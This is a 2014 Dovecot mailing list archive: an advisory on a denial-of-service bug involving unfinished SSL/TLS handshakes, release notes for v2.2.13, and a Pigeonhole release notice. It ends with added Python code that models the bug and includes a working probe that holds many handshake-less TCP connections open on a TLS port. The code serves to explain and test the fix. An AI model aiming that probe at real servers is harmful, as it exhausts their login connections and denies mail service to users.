From tss at iki.fi Thu May 8 15:29:27 2014
From: tss at iki.fi (Timo Sirainen)
Date: Thu, 8 May 2014 18:29:27 +0300
Subject: [Dovecot-news] Denial of Service attacks against Dovecot v1.1+
Message-ID: <5FBF2986-1080-4205-82D7-67781BC70F8C@iki.fi>

There's an upper limit to how many IMAP/POP3 connections can exist that haven't logged in (and separate limits for post-login). Normally when this limit is reached, the oldest connection gets disconnected. There is of course some potential to try to DoS Dovecot by doing a lot of IMAP/POP3 connections, but because the oldest connection always gets destroyed this requires quite a lot of activity from the attacker.

This "destroy oldest connection" however hasn't been working in v1.1+ releases for connections that have started an SSL/TLS handshake, but haven't finished it. So an attacker could just do a bunch of TCP connections to port 993 and leave them hanging around and Dovecot would pretty quickly reach the upper limit without being able to disconnect any of the oldest connections.

Here are patches to fix this:

http://hg.dovecot.org/dovecot-2.2/rev/41622541a7a3
http://hg.dovecot.org/dovecot-2.1/rev/b7ac23b4d339
http://hg.dovecot.org/dovecot-2.0/rev/48f90e7e92dc
http://hg.dovecot.org/dovecot-1.2/rev/8ba4253adc9b
http://hg.dovecot.org/dovecot-1.1/rev/fe0e6550585c

The fix will be in v2.2.13. Maybe also in v2.1.18 if I decide to release it. For older releases you need to patch it yourself.

For people who are using dovecot-ee releases the fix is also in v2.2.12.12 and v2.1.7.7 releases.

From tss at iki.fi Thu May 8 15:37:20 2014
From: tss at iki.fi (Timo Sirainen)
Date: Thu, 8 May 2014 18:37:20 +0300
Subject: [Dovecot-news] v2.2.13.rc1 released
Message-ID:

http://dovecot.org/releases/2.2/rc/dovecot-2.2.13.rc1.tar.gz
http://dovecot.org/releases/2.2/rc/dovecot-2.2.13.rc1.tar.gz.sig

There have been a ton of smaller and some larger changes since v2.2.12, so I thought I'd first make an RC release and the final v2.2.13 tomorrow.
Please try it out!

BTW. I've read most of the mails again in the Dovecot mailing list, but there are still a few reported bugs I decided to leave until later. Anyway feel free to re-send any bug reports for things that haven't been fixed in v2.2.13 yet.

 * Fixed a DoS attack against imap/pop3-login processes. If SSL/TLS handshake was started but wasn't finished, the login process attempted to eventually forcibly disconnect the client, but failed to do it correctly. This could have left the connections hanging around for a long time. (Affected Dovecot v1.1+)
 + mdbox: Added mdbox_purge_preserve_alt setting to keep the file within alt storage during purge. (Should become enforced in v2.3.0?)
 + fts: Added support for parsing attachments via Apache Tika. Enable with: plugin { fts_tika = http://tikahost:9998/tika/ }
 + virtual plugin: Delay opening backend mailboxes until it's necessary. This requires mailbox_list_index=yes to work. (Currently IMAP IDLE command still causes all backend mailboxes to be opened.)
 + mail_never_cache_fields=* means now to disable all caching. This may be a useful optimization as doveadm/dsync parameter for some admin tasks which shouldn't really update the cache file.
 + IMAP: Return SPECIAL-USE flags always for LSUB command.
 - pop3 server was still crashing in v2.2.12 with some settings
 - maildir: Various fixes and improvements to handling compressed mails, especially when they have broken/missing S=sizes in filenames.
 - fts-lucene, fts-solr: Fixed crash on search when the index contained duplicate entries.
 - Many fixes and performance improvements to dsync and replication
 - director was somewhat broken when there were exactly two directors in the ring. It caused errors about "weak users" getting stuck.
 - mail_attachment_dir: Attachments with the last base64-encoded line longer than the rest weren't handled correctly.
 - IMAP: SEARCH/SORT PARTIAL was handled completely wrong in v2.2.11+
 - acl: Global ACL file handling was broken when multiple entries matched the mailbox name. (Only the first entry was used.)

From tss at iki.fi Sun May 11 19:37:38 2014
From: tss at iki.fi (Timo Sirainen)
Date: Sun, 11 May 2014 22:37:38 +0300
Subject: [Dovecot-news] v2.2.13 released
Message-ID:

http://dovecot.org/releases/2.2/dovecot-2.2.13.tar.gz
http://dovecot.org/releases/2.2/dovecot-2.2.13.tar.gz.sig

A few minor changes since v2.2.13.rc1, mainly making the Pigeonhole tests pass.

 * Fixed a DoS attack against imap/pop3-login processes. If SSL/TLS handshake was started but wasn't finished, the login process attempted to eventually forcibly disconnect the client, but failed to do it correctly. This could have left the connections hanging around for a long time. (Affected Dovecot v1.1+)
 + mdbox: Added mdbox_purge_preserve_alt setting to keep the file within alt storage during purge. (Should become enforced in v2.3.0?)
 + fts: Added support for parsing attachments via Apache Tika. Enable with: plugin { fts_tika = http://tikahost:9998/tika/ }
 + virtual plugin: Delay opening backend mailboxes until it's necessary. This requires mailbox_list_index=yes to work. (Currently IMAP IDLE command still causes all backend mailboxes to be opened.)
 + mail_never_cache_fields=* means now to disable all caching. This may be a useful optimization as doveadm/dsync parameter for some admin tasks which shouldn't really update the cache file.
 + IMAP: Return SPECIAL-USE flags always for LSUB command.
 - pop3 server was still crashing in v2.2.12 with some settings
 - maildir: Various fixes and improvements to handling compressed mails, especially when they have broken/missing S=sizes in filenames.
 - fts-lucene, fts-solr: Fixed crash on search when the index contained duplicate entries.
 - Many fixes and performance improvements to dsync and replication
 - director was somewhat broken when there were exactly two directors in the ring. It caused errors about "weak users" getting stuck.
 - mail_attachment_dir: Attachments with the last base64-encoded line longer than the rest weren't handled correctly.
 - IMAP: SEARCH/SORT PARTIAL was handled completely wrong in v2.2.11+
 - acl: Global ACL file handling was broken when multiple entries matched the mailbox name. (Only the first entry was used.)

From stephan at rename-it.nl Mon May 12 19:25:56 2014
From: stephan at rename-it.nl (Stephan Bosch)
Date: Mon, 12 May 2014 21:25:56 +0200
Subject: [Dovecot-news] Released Pigeonhole v0.4.3 for Dovecot v2.2.13.
Message-ID: <53712044.8050001@rename-it.nl>

Hello Dovecot users,

Now that Dovecot v2.2.13 is released, I can release a new Pigeonhole. Due to changes in Dovecot, this Pigeonhole release will not compile cleanly against older Dovecot releases.

This release is mainly about bugfixes. One notable addition is that I have updated the "vnd.dovecot.duplicate" extension to the new IETF draft "duplicate" extension.

Changelog v0.4.3:

 * Editheader extension: Made control characters allowed for editheader, except NUL. Before, this would cause a runtime error.
 + Upgraded Dovecot-specific Sieve "vnd.dovecot.duplicate" extension to match the new draft "duplicate" extension.
 - Fixed sieve_result_global_log_error to log only as i_info in administrator log (syslog) if executed from multiscript context.
 - Sieve redirect extension: Adjusted loop detection to show leniency to resent messages.
 - Sieve include extension: Fixed problem with handling of duplicate includes with different parameters :once or :optional.
 - Sieve spamtest/virustest extensions: Tests were erroneously performed against the original message. When used together with extprograms filter to add the spam headers, the changes were not being used by the spamtest and virustest extensions.
 - Deprecated Sieve notify extension: Fixed segfault problems in message string substitution.
 - ManageSieve: Fixed active link verification to handle redundant path slashes correctly.
 - Sieve vacation extension:
   - Fixed interaction of sieve_vacation_dont_check_recipient with sieve_vacation_send_from_recipient setting.
   - Fixed log message for discarded response.
 - Sieve extprograms plugin:
   - Forgot to disable the alarm() timeouts set for script execution.
   - Fixed fd leak and handling of output shutdown.
   - Fixed 'Bad filedescriptor' error occurring when disconnecting script client.
   - Made sure that programs are never forked with root privileges.

The release is available as follows:

http://pigeonhole.dovecot.org/releases/2.2/dovecot-2.2-pigeonhole-0.4.3.tar.gz
http://pigeonhole.dovecot.org/releases/2.2/dovecot-2.2-pigeonhole-0.4.3.tar.gz.sig

Refer to http://pigeonhole.dovecot.org and the Dovecot v2.x wiki for more information.

Have fun testing this new release and don't hesitate to notify me when there are any problems.

Regards,

--
Stephan Bosch
stephan at rename-it.nl
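The half-open TLS connection problem from Timo's 8 May advisory above, modelled as an added example (this is illustration code written for this page, not Dovecot's code): a toy pre-login connection table with the "drop the oldest connection when full" rule, in a buggy form whose evictor never considers a connection that is still in the SSL handshake and a fixed form that considers every pre-login connection, plus a probe that opens TCP connections to the port and never sends a ClientHello. The class and function names, the connection limit of 3, the 8 probe connections and the loopback listener are assumptions; the listener stands in for port 993 on a real server.

```python
import socket
import threading
import time

HANDSHAKING = "ssl-handshake"   # accepted on the TLS port, handshake never completed
PRE_LOGIN = "pre-login"         # handshake done, waiting for LOGIN/AUTH (unused by the probe)


class LoginProcessSim:
    """Hypothetical model of a login process's table of not-yet-logged-in
    connections (constructed for this example; not Dovecot code).

    When the table is over its limit the oldest connection is dropped.
    evict_handshaking=False reproduces the behaviour the advisory describes:
    connections still in the SSL handshake are never chosen, so the table
    fills up with them.  evict_handshaking=True drops the oldest pre-login
    connection regardless of its state."""

    def __init__(self, max_connections, evict_handshaking):
        self.max_connections = max_connections
        self.evict_handshaking = evict_handshaking
        self.conns = []            # accept order, oldest first: (time, sock, state)
        self.dropped = 0
        self._stop = threading.Event()
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.bind(("127.0.0.1", 0))   # port 0: the OS picks a free port
        self.listener.listen(128)
        self.listener.settimeout(0.05)         # lets the accept loop notice stop()
        self._thread = threading.Thread(target=self._serve, daemon=True)

    def start(self):
        self._thread.start()
        return self.listener.getsockname()     # (host, port) for the probe

    def _serve(self):
        while not self._stop.is_set():
            try:
                sock, _ = self.listener.accept()
            except socket.timeout:
                continue
            # The probe never speaks TLS, so every connection stays in handshake.
            self.conns.append((time.monotonic(), sock, HANDSHAKING))
            self._enforce_limit()

    def _enforce_limit(self):
        while len(self.conns) > self.max_connections:
            candidates = [c for c in self.conns
                          if self.evict_handshaking or c[2] != HANDSHAKING]
            if not candidates:
                return            # the bug: over the limit, yet nothing is evictable
            oldest = candidates[0]
            self.conns.remove(oldest)
            oldest[1].close()     # the client sees a FIN: recv() returns b""
            self.dropped += 1

    def stop(self):
        self._stop.set()
        self._thread.join()
        self.listener.close()
        for _, sock, _ in self.conns:
            sock.close()


def probe_half_open_tls(host, port, count, settle=0.5):
    """Open `count` TCP connections to a TLS port, send nothing, and report
    how many the server is still holding open after `settle` seconds.
    Against a real server run this only on your own test instance."""
    socks = [socket.create_connection((host, port)) for _ in range(count)]
    time.sleep(settle)
    still_open = 0
    for s in socks:
        s.settimeout(0.2)
        try:
            closed = s.recv(1, socket.MSG_PEEK) == b""   # b"" means the peer sent FIN
        except socket.timeout:
            closed = False        # no data and no FIN: the server is still holding it
        except ConnectionResetError:
            closed = True
        still_open += 0 if closed else 1
        s.close()
    return still_open


def run_demo(evict_handshaking, limit=3, count=8):
    """Return how many of `count` handshake-less connections survive."""
    sim = LoginProcessSim(limit, evict_handshaking)
    host, port = sim.start()
    try:
        return probe_half_open_tls(host, port, count)
    finally:
        sim.stop()


if __name__ == "__main__":
    print("buggy evictor keeps open:", run_demo(False))   # all 8, limit ignored
    print("fixed evictor keeps open:", run_demo(True))    # 3, the oldest 5 dropped
```

The point the probe makes is the one in the advisory: with the buggy evictor the attacker needs no TLS at all, only idle TCP connections, and the table never shrinks; with the fixed evictor each new connection costs the attacker one of their own old ones, so holding the table full takes continuous activity.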